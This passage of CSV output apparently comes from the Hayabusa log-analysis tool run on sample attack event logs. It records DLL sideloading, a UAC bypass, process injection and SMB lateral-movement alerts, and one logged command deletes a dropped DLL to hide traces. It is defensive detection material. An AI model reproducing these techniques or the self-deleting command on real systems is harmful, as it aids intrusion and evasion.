747F3D96-4BCE-5F88-0000-0010905B4D00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_injection_persistence_run_key.evtx +2020-10-15 22:17:02.764 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Users\Public\tools\apt\tendyron.exe | Tgt Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1452 | Src PID: 2572 | Src PGUID: 747F3D96-4BCE-5F88-0000-001070544D00 | Tgt PID: 6392 | Tgt PGUID: 747F3D96-4BCE-5F88-0000-0010905B4D00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_injection_persistence_run_key.evtx +2020-10-15 22:17:02.765 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Users\Public\tools\apt\tendyron.exe | Tgt Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1452 | Src PID: 2572 | Src PGUID: 747F3D96-4BCE-5F88-0000-001070544D00 | Tgt PID: 6392 | Tgt PGUID: 
747F3D96-4BCE-5F88-0000-0010905B4D00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_injection_persistence_run_key.evtx +2020-10-17 20:38:58.613 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Font Download | URL: https://fs.microsoft.com/fs/windows/config.json,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-17 20:43:27.499 +09:00,MSEDGEWIN10,1,high,Evas,Execution from Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 20:43:27.499 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Users\Public\tools\apt\wwlib\test.exe"" | Process: C:\Users\Public\tools\apt\wwlib\test.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0xa0a10 | PID: 3660 | PGUID: 747F3D96-D8DF-5F8A-0000-0010572F7200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 20:43:31.484 +09:00,MSEDGEWIN10,1,high,Evas,Execution from Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 20:43:31.484 +09:00,MSEDGEWIN10,1,high,Exec | Evas | PrivEsc,CMSTP UAC Bypass via COM Object Access,,../hayabusa-rules/sigma/process_creation/proc_creation_win_cmstp_com_object_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 20:43:31.484 
+09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Users\Public\tools\apt\wwlib\test.exe"" | Process: C:\Users\Public\tools\apt\wwlib\test.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7} | LID: 0xa09d1 | PID: 1256 | PGUID: 747F3D96-D8E3-5F8A-0000-001029A37200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 20:43:33.449 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Roaming\WINWORD.exe | Process: C:\Users\Public\tools\apt\wwlib\test.exe | PID: 1256 | PGUID: 747F3D96-D8E3-5F8A-0000-001029A37200,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 20:43:33.476 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,../hayabusa-rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 20:43:33.476 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Roaming\wwlib.dll | Process: C:\Users\Public\tools\apt\wwlib\test.exe | PID: 1256 | PGUID: 747F3D96-D8E3-5F8A-0000-001029A37200,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 20:43:33.495 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart | Process: C:\Users\IEUser\AppData\Roaming\WINWORD.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Users\Public\tools\apt\wwlib\test.exe"" | LID: 0xa09d1 | PID: 2920 | PGUID: 
747F3D96-D8E5-5F8A-0000-0010E1BC7200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 20:43:36.306 +09:00,MSEDGEWIN10,1,high,Exec,Microsoft Office Product Spawning Windows Shell,,../hayabusa-rules/sigma/process_creation/proc_creation_win_office_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 20:43:36.306 +09:00,MSEDGEWIN10,1,high,,Application Executed Non-Executable Extension,,../hayabusa-rules/sigma/process_creation/proc_creation_win_run_executable_invalid_extension.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 20:43:36.306 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\rundll32.exe"" | Process: C:\Windows\SysWOW64\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart | LID: 0xa09d1 | PID: 840 | PGUID: 747F3D96-D8E8-5F8A-0000-00102CEF7200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 20:43:36.312 +09:00,MSEDGEWIN10,8,medium,,Process Injection,Src Process: C:\Users\IEUser\AppData\Roaming\WINWORD.exe | Tgt Process: | Src PID: 2920 | Src PGUID: 747F3D96-D8E5-5F8A-0000-0010E1BC7200 | Tgt PID: 840 | Tgt PGUID: 747F3D96-D8E8-5F8A-0000-00102CEF7200,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 20:43:40.902 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\explorer.exe"" | Process: C:\Windows\SysWOW64\explorer.exe | User: MSEDGEWIN10\IEUser | 
Parent Cmd: C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart | LID: 0xa09d1 | PID: 6552 | PGUID: 747F3D96-D8EC-5F8A-0000-001094207300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 20:43:40.903 +09:00,MSEDGEWIN10,8,medium,,Process Injection,Src Process: C:\Users\IEUser\AppData\Roaming\WINWORD.exe | Tgt Process: C:\Windows\SysWOW64\explorer.exe | Src PID: 2920 | Src PGUID: 747F3D96-D8E5-5F8A-0000-0010E1BC7200 | Tgt PID: 6552 | Tgt PGUID: 747F3D96-D8EC-5F8A-0000-001094207300,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 20:43:40.903 +09:00,MSEDGEWIN10,8,high,Evas | Exec,CACTUSTORCH Remote Thread Creation,,../hayabusa-rules/sigma/create_remote_thread/sysmon_cactustorch.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 20:43:45.120 +09:00,MSEDGEWIN10,1,high,Exec,MS Office Product Spawning Exe in User Dir,,../hayabusa-rules/sigma/process_creation/proc_creation_win_office_spawn_exe_from_users_directory.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 20:43:45.120 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Users\IEUser\AppData\Roaming\WINWORD.exe"" | Process: C:\Users\IEUser\AppData\Roaming\WINWORD.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart | LID: 0xa09d1 | PID: 1576 | PGUID: 747F3D96-D8F1-5F8A-0000-00108B4B7300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 20:43:45.130 
+09:00,MSEDGEWIN10,8,medium,,Process Injection,Src Process: C:\Users\IEUser\AppData\Roaming\WINWORD.exe | Tgt Process: C:\Users\IEUser\AppData\Roaming\WINWORD.exe | Src PID: 2920 | Src PGUID: 747F3D96-D8E5-5F8A-0000-0010E1BC7200 | Tgt PID: 1576 | Tgt PGUID: 747F3D96-D8F1-5F8A-0000-00108B4B7300,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 20:43:49.229 +09:00,MSEDGEWIN10,1,low,Evas,Windows Cmd Delete File,,../hayabusa-rules/sigma/process_creation/proc_creation_win_cmd_delete.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 20:43:49.229 +09:00,MSEDGEWIN10,1,high,Exec,Microsoft Office Product Spawning Windows Shell,,../hayabusa-rules/sigma/process_creation/proc_creation_win_office_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 20:43:49.229 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c ping 127.0.0.1&&del del /F /Q /A:H ""C:\Users\IEUser\AppData\Roaming\wwlib.dll"" | Process: C:\Windows\SysWOW64\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart | LID: 0xa09d1 | PID: 1680 | PGUID: 747F3D96-D8F5-5F8A-0000-00106B6F7300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 20:50:02.661 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: C:\Users\IEUser\AppData\Local\Temp\{ACA8FE61-4C38-4216-A89C-9F88343DF21F}-GoogleUpdateSetup.exe | URL: 
http://r3---sn-5hnedn7z.gvt1.com/edgedl/release2/update2/HvaldRNSrX7_feOQD9wvGQ_1.3.36.32/GoogleUpdateSetup.exe?cms_redirect=yes&mh=Aq&mip=213.127.67.142&mm=28&mn=sn-5hnedn7z&ms=nvh&mt=1602935359&mv=m&mvi=3&pl=17&shardbypass=yes,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-17 21:32:08.987 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: C:\Users\IEUser\AppData\Local\Temp\{8B60600B-E6B4-4083-99F3-D3A4CFB95796}-86.0.4240.75_85.0.4183.121_chrome_updater.exe | URL: http://r2---sn-5hne6nsr.gvt1.com/edgedl/release2/chrome/W_YanCvPLKRFNu-eN8kKOw_86.0.4240.75/86.0.4240.75_85.0.4183.121_chrome_updater.exe?cms_redirect=yes&mh=ps&mip=213.127.67.142&mm=28&mn=sn-5hne6nsr&ms=nvh&mt=1602937879&mv=m&mvi=2&pl=17&shardbypass=yes,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-17 21:32:11.026 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-17 21:32:11.318 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-17 21:32:11.574 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: SetupBinary | URL: 
https://oneclient.sfx.ms/Win/Prod/20.169.0823.0006/OneDriveSetup.exe,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-17 21:33:56.406 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-18 01:26:54.679 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\ProgramData\Intel\wwlib.dll | Process: C:\Windows\Explorer.EXE | PID: 3364 | PGUID: 747F3D96-19FB-5F8B-0000-0010DB270A00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sideloading_wwlib_sysmon_7_1_11.evtx +2020-10-18 01:26:54.679 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,../hayabusa-rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sideloading_wwlib_sysmon_7_1_11.evtx +2020-10-18 01:27:08.081 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: calc.exe | Process: C:\Windows\SysWOW64\calc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\ProgramData\Intel\CV.exe"" | LID: 0x8faa7 | PID: 1536 | PGUID: 747F3D96-1B5C-5F8B-0000-001006AF2100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sideloading_wwlib_sysmon_7_1_11.evtx +2020-10-18 01:27:08.734 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.2008.2.0_x64__8wekyb3d8bbwe\Calculator.exe"" -ServerName:App.AppXsm3pg4n7er43kdh1qp4e79f1j7am68r8.mca | Process: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.2008.2.0_x64__8wekyb3d8bbwe\Calculator.exe | User: MSEDGEWIN10\IEUser | 
Parent Cmd: ? | LID: 0x8faa7 | PID: 5912 | PGUID: 747F3D96-1B5C-5F8B-0000-0010A6E02100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sideloading_wwlib_sysmon_7_1_11.evtx +2020-10-18 01:27:10.464 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\RuntimeBroker.exe -Embedding | Process: C:\Windows\System32\RuntimeBroker.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ? | LID: 0x8faa7 | PID: 2720 | PGUID: 747F3D96-1B5E-5F8B-0000-001034322200,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sideloading_wwlib_sysmon_7_1_11.evtx +2020-10-18 01:27:10.787 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\HCJVGQ5XQYJQFTRJAKRF.temp | Process: C:\Windows\System32\RuntimeBroker.exe | PID: 2720 | PGUID: 747F3D96-1B5E-5F8B-0000-001034322200,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sideloading_wwlib_sysmon_7_1_11.evtx +2020-10-18 01:27:10.791 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ff99ba2fb2e34b73.customDestinations-ms~RF6f668.TMP | Process: C:\Windows\System32\RuntimeBroker.exe | PID: 2720 | PGUID: 747F3D96-1B5E-5F8B-0000-001034322200,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sideloading_wwlib_sysmon_7_1_11.evtx +2020-10-18 07:37:52.809 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: 
https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-18 07:37:52.892 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-18 07:37:52.956 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-18 07:37:52.991 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-18 07:37:53.047 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and 
Control/bits_openvpn.evtx +2020-10-18 07:37:53.111 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-18 07:37:53.169 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-18 07:37:53.230 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-18 07:37:53.417 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-18 07:37:53.527 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: 
https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-18 07:37:53.571 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-18 07:37:53.664 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-18 07:37:53.771 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-18 07:37:53.807 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-18 07:37:53.867 
+09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-18 07:37:53.928 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-18 07:52:31.218 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.15:57238 (LAPTOP-JU4M3I0E) | Dst: 10.0.2.18:445 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-726A-5F8B-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx +2020-10-18 07:52:34.249 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\ProgramData\7okjer.dll | Process: System | PID: 4 | PGUID: 747F3D96-726A-5F8B-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx +2020-10-18 07:52:34.249 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,../hayabusa-rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx +2020-10-18 07:52:34.966 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.15:57239 (LAPTOP-JU4M3I0E) | Dst: 10.0.2.18:445 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 
747F3D96-726A-5F8B-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx +2020-10-18 07:53:01.646 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.15:57240 (LAPTOP-JU4M3I0E) | Dst: 10.0.2.18:445 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-726A-5F8B-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx +2020-10-18 07:53:04.161 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.15:57241 (LAPTOP-JU4M3I0E) | Dst: 10.0.2.18:445 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-726A-5F8B-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx +2020-10-18 07:53:04.924 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.15:57242 